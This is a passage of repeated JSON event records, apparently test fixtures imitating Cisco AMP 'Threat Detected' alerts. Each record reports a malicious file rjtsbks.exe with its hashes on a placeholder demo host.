Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":208000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":208000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163578","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":192000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163577","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":192000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163576","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":145000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163575","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":145000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163574","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163573","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163572","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163571","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163570","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163568","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163567","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":83000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163566","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":67000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163565","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":67000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163564","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":20000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163563","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196266","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":833000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196265","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":818000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196264","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":724000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196263","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":708000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 